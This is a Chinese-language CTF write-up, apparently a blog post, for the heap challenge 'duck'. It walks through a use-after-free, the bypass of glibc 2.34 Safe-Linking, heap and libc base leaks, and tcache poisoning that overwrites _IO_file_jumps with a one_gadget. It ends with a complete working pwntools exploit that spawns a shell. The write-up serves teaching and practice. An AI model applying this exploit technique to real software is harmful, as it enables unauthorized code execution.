[CISCN 2022 華東北]duck

一、題目來源

NSSCTF-Pwn-[CISCN 2022 華東北]duck

二、信息蒐集

通過 file 命令查看文件類型：

通過 checksec 命令查看文件開啓的保護機制：

題目把 libc 文件和鏈接器都給我們了，我原本想着能用 pwninit 來初始化環境，但是失敗了：

$ pwninit
bin: ./ld.so
libc: ./libc.so.6

warning: failed detecting libc version (is the libc an Ubuntu glibc?): failed finding version string
copying ./ld.so to ./ld.so_patched
running patchelf on ./ld.so_patched
writing solve.py stub

看報錯信息應該是版本沒有匹配到，而且它還錯誤地把鏈接器去打了個補丁……

既然本題不能用 pwninit，那麼我們就需要手動指定鏈接器和 libc 文件：

from pwn import *

exe = ELF("./pwn")
libc = ELF("./libc.so.6")
ld = ELF("./ld.so")

p = process([ld.path, exe.path], env={"LD_PRELOAD": libc.path})

三、反彙編文件開始分析

通過 menu 的輸出，我們大概就能知道本程序所實現的功能了：

ssize_t menu()
{
  puts("1.Add");
  puts("2.Del");
  puts("3.Show");
  puts("4.Edit");
  return write(1, "Choice: ", 8u);
}

一個一個功能分析。

1、Add

int Add()
{
  int i; // [rsp+4h] [rbp-Ch]
  void *v2; // [rsp+8h] [rbp-8h]

  v2 = malloc(0x100u);
  for ( i = 0; i <= 19; ++i )
  {
    if ( !heaplist[i] )
    {
      heaplist[i] = v2;
      puts("Done");
      return 1;
    }
  }
  return puts("Empty!");
}

會動態申請一片內存：

申請的內存大小為 0x100；
通過 heaplist[] 這個數組來管理每次申請的 chunk；
最多能申請 20 個 chunk。

2、Del

int Del()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("Idx: ");
  v1 = sub_1249();
  if ( v1 <= 20 && heaplist[v1] )
  {
    free((void *)heaplist[v1]);
    return puts("Done");
  }
  else
  {
    puts("Not allow");
    return v1;
  }
}

通過指定下標，來定位指定的 chunk，並且對該 chunk 進行 free 操作，但是 free 之後並沒有對指針進行置 NULL 操作，從而存在 UAF 的風險。

3、Show

int Show()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("Idx: ");
  v1 = sub_1249();
  if ( v1 <= 20 && heaplist[v1] )
  {
    puts((const char *)heaplist[v1]);
    return puts("Done");
  }
  else
  {
    puts("Not allow");
    return v1;
  }
}

根據指定的 index 來輸出 chunk 中的 User Data 部分。

4、Edit

int Edit()
{
  int v1; // [rsp+8h] [rbp-8h]
  unsigned int v2; // [rsp+Ch] [rbp-4h]

  puts("Idx: ");
  v1 = sub_1249();
  if ( v1 <= 20 && heaplist[v1] )
  {
    puts("Size: ");
    v2 = sub_1249();
    if ( v2 > 0x100 )
    {
      return puts("Error");
    }
    else
    {
      puts("Content: ");
      READ(heaplist[v1], v2);
      puts("Done");
      return 0;
    }
  }
  else
  {
    puts("Not allow");
    return v1;
  }
}

根據指定的 index 在對應 chunk 的 User Data 部分進行修改。

最大可輸入長度為 0x100。

四、思路

1、目前可見的攻擊手段

UAF + Show，我們可以通過這個組合來實現 chunk 數據結構信息的泄露。
UAF + Edit，可以讓我們修改在 bin 中的 chunk 的數據結構。
2 的衍生就是任意地址寫。

2、Safe-Linking

首先，本題的 glibc 版本為 2.34：

這個版本中，針對 Tcache/Fastbin 方面的攻擊，引入了 Safe-Linking 保護機制：

/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

Tcache 中對該保護機制的應用：

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");
  tcache->entries[tc_idx] = REVEAL_PTR (e->next);
  --(tcache->counts[tc_idx]);
  e->key = 0;
  return (void *) e;
}

要理解這個保護機制，我們先要了解 Tcache 的 chunk 的插入方式，聚焦代碼：

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

拋去保護機制不談，對插入的部分進行簡化得到：

e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;

這是一個標準的頭插法（當前塊的 next 指針指向目前的 Tcache 頭節點，接着自己作為頭節點）。

那麼，現在我們就可以知道保護機制做了什麼，即對 fd 指針進行：
$$
fd = (Current_chunk_address >> 12) \oplus Next_chunk_address
$$
的處理。

因此，如果我們要繞過保護機制，就需要知道 chunk 的地址。換言之，就是堆的地址我們能否得到。

根據目前我們發現的攻擊手段，是可以做到泄露 heap 的基址的。

Safe Linking 雖然使堆利用的難度上升，但是這個機制引發了一個非常有意思的現象。

就是在 Tcache bin 是空的情況下，當有一個 chunk 需要被放入其中的時候，此時的頭節點是等於 0 的！

這個信息我們可以在 Tcache 的初始化操作中看出來：

static void
tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct);

  if (tcache_shutting_down)
    return;

  arena_get (ar_ptr, bytes);
  victim = _int_malloc (ar_ptr, bytes);
  if (!victim && ar_ptr != NULL)
    {
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }


  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  /* In a low memory situation, we may not be able to allocate memory
     - in which case, we just keep trying later.  However, we
     typically do this very early, so either there is sufficient
     memory, or there isn't enough memory to do non-trivial
     allocations anyway.  */
  if (victim)
    {
      tcache = (tcache_perthread_struct *) victim;
      memset (tcache, 0, sizeof (tcache_perthread_struct));
    }

}

關鍵點：

victim = _int_malloc (ar_ptr, bytes); 先從 arena 裏 malloc 出一塊 sizeof (tcache_perthread_struct) 的內存。
tcache = (tcache_perthread_struct *) victim; 把這塊內存當成 tcache_perthread_struct 用。
memset (tcache, 0, sizeof (tcache_perthread_struct)); 把這整個結構體全部置 0。

所以説，在 tcache 初始化完成且某個 bin 還沒放過任何 chunk 的情況下，tcache->entries[tc_idx] 一定是 0。

而任何數和 0 進行異或，結果仍然是它本身。於是我們就得到了：

$$
fd = (Current_chunk_address >> 12)
$$

從代碼中，我們也可以看出 Tcache 初始化會動態申請一片大小為 sizeof (tcache_perthread_struct) 的內存，根據結構體和對應的宏定義：

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

# define TCACHE_MAX_BINS		64

counts 數組：
- 類型為 uint16_t (2 字節)
- 數量 64
- 大小：$64 \times 2 = 128$ 字節 (0x80)
entries 數組：
- 類型為指針 (8 字節)
- 數量 64
- 大小：$64 \times 8 = 512$ 字節 (0x200)
結構體總數據大小：
- 0x80 + 0x200 = 0x280 字節
加上 Chunk 頭 (Header)：
- 0x280 + 0x10 = 0x290 字節

計算得到 Tcache 管理塊的大小（size，包含 chunk header）為 0x290。

注意，不同的 glibc 版本的該大小也是有區別的，不要死記，可以根據源碼來推導。

分配完 Tcache 管理塊之後再分配你申請的 chunk。那麼，只要你申請的 chunk 不是很大，這個 chunk 的所在地址就會滿足 $\le heap_base_address + 0x1000$。

而堆的地址，根據頁對齊的要求，通常是 0x1000 的整數倍。

換言之，我們將此時的 fd 指針的值，進行：

$$
fd = fd << 12
$$

的操作之後，得到的地址很有可能就是堆的基址。

對一個數進行左移 12 位，再進行右移 12 位，就相當於將最低的 12 位比特都清 0 了。

打個比方：

堆的起始地址為 0xaa……a000。
你申請的 chunk 的所在位置 0xaa……a500。

那麼，對 0xaa……a500 依次進行 $>> 12$ 和 $<< 12$ 操作之後，就會得到 0xaa……a000 即堆的基址。

3、hooks 的移除

這也就意味着，打 hook 劫持的思路斷掉了。

4、路線

綜上，我們得出了可行的利用路線：在泄露堆、libc 基址的情況下，通過任意地址寫入，實現劫持 __libc_IO_vtables 中的 IO_jump_t 的實例（比如：IO_file_jumps）為 one_gadget。

五、Poc

1、程序四個功能的實現

def Add():
    p.sendafter(b'Choice: ',b'1')

def Del(index):
    p.sendafter(b'Choice: ',b'2')
    p.sendafter(b'Idx: ',index)

def Show(index):
    p.sendafter(b'Choice: ',b'3')
    p.sendafter(b'Idx: ',index)

def Edit(index,size,content):
    p.sendafter(b'Choice: ',b'4')
    p.sendafter(b'Idx: ',index)
    p.sendafter(b'Size: ',size)
    p.sendafter(b'Content: ',content)

2、泄露堆基址

可以先來驗證一下，我們之前分析的對不對，申請一個 chunk：

Add() # 0
gdb.attach(p)
pause()

驗證了 Tcache 管理塊的大小確實是 0x290。

現在，我們將申請的 chunk 釋放：

Add() # 0
Del(b'0')
gdb.attach(p)
pause()

將 fd 指針進行 $fd = fd << 12$ 之後，得到的結果確實是堆的基址。

泄露：

Add() # 0
Del(b'0')

Show(b'0')
p.recvline()
leak = u64(p.recvline()[:-1].ljust(8,b'\x00')) << 12
success("heap_base: " + hex(leak))

3、泄露 libc 基址

這個的泄露方法想必大家都不陌生，就是利用 Unsorted bin 的特性。

關鍵點就在於，如何讓 chunk 進入 Unsorted bin？

本題中，申請的 chunk 大小是 0x100，這個大小是符合 Tcache 而不符合 Fastbin 的。

這個信息大家同樣可以從 glibc 源碼中分析出來，這裏展示部分：

#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)

# define TCACHE_MAX_BINS		64
# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables.  */
# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
……

而 Unsorted bin 中 chunk 的來源：

當一個較大的 chunk 被分割成兩半後，如果剩下的部分大於 MINSIZE，就會被放到 unsorted bin 中。
釋放一個不屬於 Tcache bin 或 fast bin 的 chunk，並且該 chunk 不和 top chunk 緊鄰時，該 chunk 會被首先放到 unsorted bin 中。
當進行 malloc_consolidate 時，可能會把合併後的 chunk 放到 unsorted bin 中，如果不是和 top chunk 近鄰的話。

根據第二條，我們只要將 Tcache 給填滿，即可讓 chunk 進入 Unsorted bin，填滿的要求：

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7

#if USE_TCACHE
  ,
  .tcache_count = TCACHE_FILL_COUNT,
  .tcache_bins = TCACHE_MAX_BINS,
  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
  .tcache_unsorted_limit = 0 /* No limit.  */
#endif

很明顯，每一個 Tcache bin 中最多能存放 7 個 chunk，那麼當大小為 0x110（算上 chunk header）的 Tcache bin 被填滿之後，我們繼續釋放一個不屬於 Fastbin 大小的 chunk，如果這個 chunk 不與 top chunk 相鄰，它就會進入 Unsorted bin。

如何不與 top chunk 相鄰？

很簡單，在第八個 chunk 的後面再申請一個即可，對應的代碼：

for i in range(9):
    Add()
for i in range(1,9):
    Del(str(i).encode())

gdb.attach(p)
pause()

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x555577c12a00
Size: 0x110 (with flag bits: 0x111)
fd: 0x7310f94e8cc0
bk: 0x7310f94e8cc0

目前 index 的使用情況：

泄露 libc 地址：

Show(b'8')
p.recvline()
leak = u64(p.recvline()[:-1].ljust(8,b'\x00'))
offset = 96
main_arena = libc.symbols['main_arena']
libc_base = leak - offset - main_arena
success("libc_base: " + hex(libc_base))

4、劫持

我們劫持的對象是 FILE 結構體中的 vtable 指針所指向的 _IO_jump_t 的實例，將裏面的函數地址替換成我們準備好的 one_gadget。

因此，我們需要確定要劫持哪一個 FILE 結構體？

選擇一個 IO 函數，比如 puts，在 Glibc 源文件中找到其對應的定義：

#include "libioP.h"
#include <string.h>
#include <limits.h>

int
_IO_puts (const char *str)
{
  int result = EOF;
  size_t len = strlen (str);
  _IO_acquire_lock (stdout);

  if ((_IO_vtable_offset (stdout) != 0
       || _IO_fwide (stdout, -1) == -1)
      && _IO_sputn (stdout, str, len) == len
      && _IO_putc_unlocked ('\n', stdout) != EOF)
    result = MIN (INT_MAX, len + 1);

  _IO_release_lock (stdout);
  return result;
}

weak_alias (_IO_puts, puts)
libc_hidden_def (_IO_puts)

其中，用到 FILE 結構體的我們都可以去 glibc 源碼中追蹤一下其調用流。

拿 _IO_putc_unlocked 舉例子，找到其定義：

#define _IO_putc_unlocked(_ch, _fp) __putc_unlocked_body (_ch, _fp)

接着找 __putc_unlocked_body (_ch, _fp) 的定義：

#define __putc_unlocked_body(_ch, _fp)					\
  (__glibc_unlikely ((_fp)->_IO_write_ptr >= (_fp)->_IO_write_end)	\
   ? __overflow (_fp, (unsigned char) (_ch))				\
   : (unsigned char) (*(_fp)->_IO_write_ptr++ = (_ch)))

要想理解這段代碼，就得對 FILE 的結構有所瞭解，這裏放出與之有關的定義：

struct _IO_FILE
{
  ……
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  ……
};

明顯，當緩衝與滿了的時候，會調用 __overflow() 函數，這個函數是在 _IO_jump_t 結構體中有定義：

#define JUMP_FIELD(TYPE, NAME) TYPE NAME

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow); // 在這：刷新緩衝區
    JUMP_FIELD(_IO_underflow_t, __underflow); 
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    ……
};

我們知道，vtable 指針指向的是該結構體的實例。stdout 中的 vtable 指針指向的就是 _IO_file_jumps。

為什麼是這樣的對應呢？

依舊從源碼出發，在文件 /libio/stdio.c 中可以找到：

FILE *stdout = (FILE *) &_IO_2_1_stdout_;

而 _IO_2_1_stdout_ 的定義如下：

#ifdef _IO_MTSAFE_IO
# define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \
  static _IO_lock_t _IO_stdfile_##FD##_lock = _IO_lock_initializer; \
  static struct _IO_wide_data _IO_wide_data_##FD \
    = { ._wide_vtable = &_IO_wfile_jumps }; \
  struct _IO_FILE_plus NAME \
    = {FILEBUF_LITERAL(CHAIN, FLAGS, FD, &_IO_wide_data_##FD), \
       &_IO_file_jumps};
#else
# define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \
  static struct _IO_wide_data _IO_wide_data_##FD \
    = { ._wide_vtable = &_IO_wfile_jumps }; \
  struct _IO_FILE_plus NAME \
    = {FILEBUF_LITERAL(CHAIN, FLAGS, FD, &_IO_wide_data_##FD), \
       &_IO_file_jumps};
#endif

DEF_STDFILE(_IO_2_1_stdin_, 0, 0, _IO_NO_WRITES);
DEF_STDFILE(_IO_2_1_stdout_, 1, &_IO_2_1_stdin_, _IO_NO_READS);
DEF_STDFILE(_IO_2_1_stderr_, 2, &_IO_2_1_stdout_, _IO_NO_READS+_IO_UNBUFFERED);

將宏展開之後可以得到等價定義：

struct _IO_FILE_plus _IO_2_1_stdout_ =
{
    FILEBUF_LITERAL(...),   // 填滿前面的 _IO_FILE 那一坨字段
    &_IO_file_jumps         // vtable 指針
};

Poc：

'''
0xda861 execve("/bin/sh", r13, r12)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xda864 execve("/bin/sh", r13, rdx)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xda867 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp
'''
one_gadget = [libc_base + 0xda861, libc_base + 0xda864, libc_base + 0xda867]

_IO_file_jumps = libc_base + libc.symbols['_IO_file_jumps']

target = ((heap_base + 0x8f0) >> 12) ^ (_IO_file_jumps) # Safe-Linking，注意 0x8f0 是通過動態調試找到的
Edit(b'7',b'8',p64(target))

Add()
Add()

Edit(b'11',b'64',p64(0)*3 + p64(one_gadget[1])) # 測試後，第二條 one_gadget 可行。

5、完整 Poc

from heapq import heapify
from pwn import *

exe = ELF("./pwn")
libc = ELF("./libc.so.6")
ld = ELF("./ld.so")

p = process([ld.path, exe.path], env={"LD_PRELOAD": libc.path})

def Add():
    p.sendafter(b'Choice: ',b'1')

def Del(index):
    p.sendafter(b'Choice: ',b'2')
    p.sendafter(b'Idx: ',index)

def Show(index):
    p.sendafter(b'Choice: ',b'3')
    p.sendafter(b'Idx: ',index)

def Edit(index,size,content):
    p.sendafter(b'Choice: ',b'4')
    p.sendafter(b'Idx: ',index)
    p.sendafter(b'Size: ',size)
    p.sendafter(b'Content: ',content)

Add() # 0
Del(b'0')

Show(b'0')
p.recvline()
heap_base = u64(p.recvline()[:-1].ljust(8,b'\x00')) << 12
success("heap_base: " + hex(heap_base))

for i in range(9):
    Add()
for i in range(1,9):
    Del(str(i).encode())

Show(b'8')
p.recvline()
leak = u64(p.recvline()[:-1].ljust(8,b'\x00'))
offset = 96
main_arena = libc.symbols['main_arena']
libc_base = leak - offset - main_arena
success("libc_base: " + hex(libc_base))

'''
0xda861 execve("/bin/sh", r13, r12)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xda864 execve("/bin/sh", r13, rdx)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xda867 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp
'''
one_gadget = [libc_base + 0xda861, libc_base + 0xda864, libc_base + 0xda867]

_IO_file_jumps = libc_base + libc.symbols['_IO_file_jumps']

target = ((heap_base + 0x8f0) >> 12) ^ (_IO_file_jumps)
Edit(b'7',b'8',p64(target))

Add()
Add()

Edit(b'11',b'64',p64(0)*3 + p64(one_gadget[1]))

p.interactive()

YouDiscovered1t 博客

YouDiscovered1t 博客

博客 / 詳情